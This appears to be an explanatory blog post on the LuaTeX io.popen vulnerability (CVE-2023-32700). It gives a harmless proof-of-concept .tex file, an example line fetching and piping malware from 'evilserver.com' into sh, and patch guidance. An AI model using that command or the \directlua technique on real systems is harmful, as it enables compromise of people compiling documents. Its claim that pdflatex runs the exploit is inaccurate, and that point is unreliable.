In 2023, security researchers uncovered a high-impact vulnerability (CVE-2023-32700) affecting LuaTeX, one of the world’s most widely used typesetting engines. This bug turned TeX documents into a vehicle for shell command execution — just by opening and compiling them. If you're a LaTeX or TeX user, especially one who grabs .tex files off the Internet, you need to understand this flaw and see how easily it could be exploited. Here’s an exclusive, down-to-earth deep dive.
1. What Is LuaTeX, and Where’s the Danger?
LuaTeX extends the classic TeX typesetting system with Lua scripting capabilities. It enables advanced users and packages to automate document tasks and customize typesetting. LuaTeX is used in:
- TeX Live distributions (used by most Unix/Linux/macOS TeX users)
Many automated build systems (journals, e-book publishers, etc.)
The Danger: Allowing untrusted scripts *inside* a document to access the operating system (like running rm -rf / or planting malware) is a recipe for disaster. Lua is powerful, and if not sandboxed, it can break out of the TeX input box and into your real machine.
This vulnerability revolves around something simple, but critical
> LuaTeX before version 1.17. allows any TeX document, through embedded Lua code, to access the io.popen function, which can execute any shell command.
This is traced back to the file luatex-core.lua, which did not block, restrict, or safely proxy OS command execution.
Here’s why this is bad: many TeX users routinely run third-party .tex files. If a file you compile runs os.execute("wget evilserver.com/malware | sh"), your computer could be compromised.
3. Let's See The Exploit in Action
Here’s a *simple* malicious TeX file that demonstrates the vulnerability. If you run this with an affected LuaTeX (before 1.17., TeX Live before 2023 r66984, or MiKTeX before 23.5), it’ll create a file called hacked.txt in your directory.
\documentclass{article}
\begin{document}
\directlua{
local f = io.popen("echo HACKED > hacked.txt", "r")
f:close()
}
Hello, world!
\end{document}
If you pdflatex or lualatex this file, it executes the shell command echo HACKED > hacked.txt. An attacker could do much worse.
The Lua API exposes io.popen, which can run *any* shell command.
- Early versions of luatex-core.lua did not disable or filter dangerous calls when compiling documents.
Your document includes \directlua{} code, or loads packages that could do so
- You compile TeX files from untrusted sources (e.g., StackExchange, emails, students, or the open internet).
5. How Was It Fixed?
Developers patched LuaTeX in version 1.17. by restricting unsafe functions. Now, io.popen is no longer available to normal TeX documents.
For TeX Live, update to 2023 or later, revision 66984+
For MiKTeX, upgrade to 23.5 or newer
6. References & Further Reading
- LuaTeX 1.17. Release Notes
- TeX Live Bug Report #65856
- NVD CVE-2023-32700 Entry
- MiKTeX Security Fix Notes
- TeX StackExchange: "How can LuaTeX scripts execute shell commands?" (for more context)
7. Bottom Line: Be Cautious with TeX Documents
This bug was a wake-up call for the TeX compilers community. Modern LuaTeX and LaTeX are *not* just typesetting tools — they're programmable, and, if left unguarded, can be exploited like any programming platform.
Words to Remember:
> Never run untrusted TeX files unless you are sure your TeX system is up to date!
Timeline
Published on: 05/20/2023 18:15:00 UTC
Last modified on: 06/04/2023 03:15:00 UTC